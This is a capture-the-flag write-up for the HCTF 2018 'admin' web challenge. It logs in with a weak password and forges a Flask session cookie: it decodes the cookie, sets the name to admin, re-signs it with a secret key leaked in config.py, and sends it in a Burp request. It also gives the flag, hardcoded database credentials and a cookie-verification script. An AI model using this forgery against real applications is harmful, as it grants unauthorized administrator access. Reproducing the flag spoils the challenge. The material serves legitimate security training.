BUUCTF WEB [HCTF 2018]admin

Solution 1

Log in with a weak password

admin
123

This yields the flag

flag{195df147-fa34-4359-b475-94f71265d085}

Solution 2

Press F12 to view the page source; on the change page there is a comment

<!-- https://github.com/woadsl1234/hctf_flask/ -->

Download and analyze the source code: the site is built with Flask templates, so try SSTI (template injection).

  • Inspect the route information

    routes.py

    @app.route('/')
    @app.route('/index')
    def index():
        return render_template('index.html', title = 'hctf')
    

    index.html

    {% include('header.html') %}
    {% if current_user.is_authenticated %}
    <h1 class="nav">Hello {{ session['name'] }}</h1>
    {% endif %}
    {% if current_user.is_authenticated and session['name'] == 'admin' %}
    <h1 class="nav">hctf{xxxxxxxxx}</h1>
    {% endif %}
    <!-- you are not admin -->
    <h1 class="nav">Welcome to hctf</h1>
    
    {% include('footer.html') %}
    

    index.html contains one injection point

    Hello {{ session['name'] }}
    
  • Try to forge the session. First use flask_session_cookie_manager to decode the current session

    python3 flask_session_cookie_manager3.py decode -c ".eJw9kMGKgzAURX9leGsXmnY2hS5mSCeM8BIM0ZBsSsemamw6oJZaS_99xIEu7urA4d77gP2pc30Nm6G7ugj2zRE2D3j7gQ0gyyecZC1oHSzNVkjk2YSiRrq7WVqcOS3fecjuXONovUkEzWNkuEZmYuOrldC8EXqXGLJ4vJk-JvQZ4UG2SPLRqNlFvjwn3zH3tkW9G1EdA9IsQZK2NsyMmRVn2VowG7gyhHsZhCoTy3CyAQmqNKAyW3hGUPbdaT_8tu7ymmB1URsi58r5aHXaCFbMmSsS2Qj1ebbajMjSmk-y4T6_W1ol_LZddE04VO5lKvPBuOqfXA5hBjC4foAIrr3rltsgieH5B_EYa-E.YlvM9w.qndN8qh-krjrQ-rlSxvdMc6AFNY"
    

    This gives

    b'{"_fresh":true,"_id":{" b":"MGUzMzRhODhmZDQ3M2RlYmVhMDEwZDVlNDc5NmQyNWMxZjY1ODU0MGM4MGY0Yjg3OWNiOWE1Y2UzMzRjYzAzMjQ2NmRkM2UxYTVhM2FjN2I0NjZkMWExMTdmMDQ1M2JkZmFjNGY3NGQ4OGZmNTY2NjRmOTc1ZGMzZmM2MTJmMTY="},"csrf_token":{" b":"ZWVhY2RhMDUxZWJiOGViOGM4M2RiOTBlZWYxMGJhNzRiNjUyZDg1Nw=="},"image":{" b":"cUtYeg=="},"name":"test","user_id":"10"}'
    

    Then change the value of name to admin

    b'{"_fresh":true,"_id":{" b":"MGUzMzRhODhmZDQ3M2RlYmVhMDEwZDVlNDc5NmQyNWMxZjY1ODU0MGM4MGY0Yjg3OWNiOWE1Y2UzMzRjYzAzMjQ2NmRkM2UxYTVhM2FjN2I0NjZkMWExMTdmMDQ1M2JkZmFjNGY3NGQ4OGZmNTY2NjRmOTc1ZGMzZmM2MTJmMTY="},"csrf_token":{" b":"ZWVhY2RhMDUxZWJiOGViOGM4M2RiOTBlZWYxMGJhNzRiNjUyZDg1Nw=="},"image":{" b":"cUtYeg=="},"name":"admin","user_id":"10"}'
    

    The SECRET_KEY used to sign the session cookie is found in config.py

    import os
    
    class Config(object):
        SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
        SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
        SQLALCHEMY_TRACK_MODIFICATIONS = True
    

    Encode (sign) the modified session with that key

    python3 flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh':True,'_id': b'0e334a88fd473debea010d5e4796d25c1f658540c80f4b879cb9a5ce334cc032466dd3e1a5a3ac7b466d1a117f0453bdfac4f74d88ff56664f975dc3fc612f16','csrf_token': b'eeacda051ebb8eb8c83db90eef10ba74b652d857','image': b'qKXz','name':'admin','user_id':'10'}"
    
    .eJw9kMGKwjAURX9leGsXbXQ2gosZ4oQpvISGtCHZiFNrm9TnQFWsFf99igMu7urA4d57h82-r08tLM_9pZ7BJuxgeYe3H1gCimLEUbeKt-R5PkemD47KFvn66nl5kLx6l5TfpMXBR5cqXiQocIHCJS42c2VlUHadOvb0RDd-jBhzJkl3yIrBmcnFvqJk34mMvkO7HtDsCHmeIss6TxMTbi5FvlDCkzSOyahJmSr1AkdPyNBkhMat4DGD6tTvN-ffrj6-Jnhbto7pqXIxeJsFJcopU0WmgzKfB2_dgCJr5aiDjMXN8yaV19VTF2jb1C9TVZxd3fyT45YmANsdhSPM4HKq--dvkCbw-ANc62wq.Ylvb5g.DUA8zwAHnnZJtKcOEoC84MxbRQo
    
  • Use Burp to replace the session cookie and send the request

    GET /index HTTP/1.1
    Host: 68d7742b-0d5a-43d5-b7e4-5dde4d30cca4.node4.buuoj.cn:81
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://68d7742b-0d5a-43d5-b7e4-5dde4d30cca4.node4.buuoj.cn:81/login
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: session=.eJw9kMGKwjAURX9leGsXbXQ2gosZ4oQpvISGtCHZiFNrm9TnQFWsFf99igMu7urA4d57h82-r08tLM_9pZ7BJuxgeYe3H1gCimLEUbeKt-R5PkemD47KFvn66nl5kLx6l5TfpMXBR5cqXiQocIHCJS42c2VlUHadOvb0RDd-jBhzJkl3yIrBmcnFvqJk34mMvkO7HtDsCHmeIss6TxMTbi5FvlDCkzSOyahJmSr1AkdPyNBkhMat4DGD6tTvN-ffrj6-Jnhbto7pqXIxeJsFJcopU0WmgzKfB2_dgCJr5aiDjMXN8yaV19VTF2jb1C9TVZxd3fyT45YmANsdhSPM4HKq--dvkCbw-ANc62wq.Ylvb5g.DUA8zwAHnnZJtKcOEoC84MxbRQo
    Connection: close
    
    
    
  • This yields the flag

    flag{195df147-fa34-4359-b475-94f71265d085}
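The two steps above (decoding the issued cookie, then getting a cookie accepted under the key from config.py) come down to how Flask signs its session. The following is an added example, not code from the write-up or from the challenge repository: it decodes the session payload with no key at all, which shows that a Flask session is signed but not encrypted, and it verifies the cookie's HMAC the way Flask/itsdangerous does (HMAC-SHA1, fixed salt "cookie-session"), so the only thing standing between a user and an admin session is the strength and secrecy of SECRET_KEY. The two cookie strings are the ones shown on this page.

```python
import base64
import hashlib
import hmac
import json
import zlib
from typing import Optional

# Flask's SecureCookieSessionInterface signs the session through itsdangerous
# with HMAC-SHA1 and this fixed salt; the only secret input is SECRET_KEY.
SESSION_SALT = b"cookie-session"

# Cookies copied from the write-up: the one the server issued for user "test",
# and the one produced with the SECRET_KEY ('ckj123') found in config.py.
ISSUED_COOKIE = ".eJw9kMGKgzAURX9leGsXmnY2hS5mSCeM8BIM0ZBsSsemamw6oJZaS_99xIEu7urA4d77gP2pc30Nm6G7ugj2zRE2D3j7gQ0gyyecZC1oHSzNVkjk2YSiRrq7WVqcOS3fecjuXONovUkEzWNkuEZmYuOrldC8EXqXGLJ4vJk-JvQZ4UG2SPLRqNlFvjwn3zH3tkW9G1EdA9IsQZK2NsyMmRVn2VowG7gyhHsZhCoTy3CyAQmqNKAyW3hGUPbdaT_8tu7ymmB1URsi58r5aHXaCFbMmSsS2Qj1ebbajMjSmk-y4T6_W1ol_LZddE04VO5lKvPBuOqfXA5hBjC4foAIrr3rltsgieH5B_EYa-E.YlvM9w.qndN8qh-krjrQ-rlSxvdMc6AFNY"
FORGED_COOKIE = ".eJw9kMGKwjAURX9leGsXbXQ2gosZ4oQpvISGtCHZiFNrm9TnQFWsFf99igMu7urA4d57h82-r08tLM_9pZ7BJuxgeYe3H1gCimLEUbeKt-R5PkemD47KFvn66nl5kLx6l5TfpMXBR5cqXiQocIHCJS42c2VlUHadOvb0RDd-jBhzJkl3yIrBmcnFvqJk34mMvkO7HtDsCHmeIss6TxMTbi5FvlDCkzSOyahJmSr1AkdPyNBkhMat4DGD6tTvN-ffrj6-Jnhbto7pqXIxeJsFJcopU0WmgzKfB2_dgCJr5aiDjMXN8yaV19VTF2jb1C9TVZxd3fyT45YmANsdhSPM4HKq--dvkCbw-ANc62wq.Ylvb5g.DUA8zwAHnnZJtKcOEoC84MxbRQo"


def _b64decode(data: str) -> bytes:
    """URL-safe base64 with the padding that itsdangerous strips restored."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def decode_payload(cookie: str) -> dict:
    """Read the session contents without any key: the payload is only signed,
    never encrypted, so nothing stored in a Flask session is confidential."""
    payload = cookie.rsplit(".", 2)[0]        # "<payload>.<timestamp>.<sig>"
    if payload.startswith("."):               # '.' prefix = zlib-compressed JSON
        raw = zlib.decompress(_b64decode(payload[1:]))
    else:
        raw = _b64decode(payload)
    return json.loads(raw)


def verify_cookie(cookie: str, secret_key: str) -> Optional[dict]:
    """Return the session dict only if the HMAC was made with secret_key."""
    payload, timestamp, signature = cookie.rsplit(".", 2)
    # itsdangerous key derivation ("hmac" mode): HMAC-SHA1(SECRET_KEY, salt)
    derived = hmac.new(secret_key.encode(), SESSION_SALT, hashlib.sha1).digest()
    # The signature covers payload and timestamp, joined by the '.' separator.
    signed = f"{payload}.{timestamp}".encode()
    expected = hmac.new(derived, signed, hashlib.sha1).digest()
    if not hmac.compare_digest(expected, _b64decode(signature)):
        return None
    return decode_payload(cookie)


if __name__ == "__main__":
    print(decode_payload(ISSUED_COOKIE)["name"])           # test
    print(verify_cookie(FORGED_COOKIE, "ckj123")["name"])  # admin
    print(verify_cookie(FORGED_COOKIE, "some-other-key"))  # None
```

A deployment check that follows from this: if a cookie from your own app verifies under the hard-coded fallback in config.py, the SECRET_KEY environment variable was never set.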
    